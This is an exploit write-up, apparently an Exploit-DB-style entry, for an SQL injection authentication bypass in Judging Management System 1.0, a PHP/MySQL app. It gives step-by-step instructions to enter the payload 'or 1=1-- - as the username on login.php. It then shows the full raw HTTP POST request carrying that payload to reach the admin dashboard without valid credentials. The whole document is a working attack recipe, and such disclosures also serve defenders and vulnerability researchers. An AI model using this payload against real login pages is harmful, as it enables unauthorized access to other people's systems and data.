Judging Management System 1.0 SQL Injection

# Exploit Title: Judging Management System v1.0 - Authentication Bypass# Date: 12/11/2022# Exploit Author: Angelo Pio Amirante# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html# Version: 1.0# Tested on: Windows 10 on XAAMP server# Vulnerability: An attacker can bypass login page and access to dashboard page# Vulnerable file: login.php# Exploit:1) Go to: http://localhost/php-jms/index.php2) As username use this payload: 'or 1=1-- -3) Use random words for passwordPOST /php-jms/login.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 37Origin: http://localhostConnection: closeReferer: http://localhost/php-jms/index.phpCookie: wp-settings-time-1=1669938282; _pk_id.1.1fff=9c7644c9d84f46f1.1670232782.Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1username=%27or+1%3D1--+-&password=asa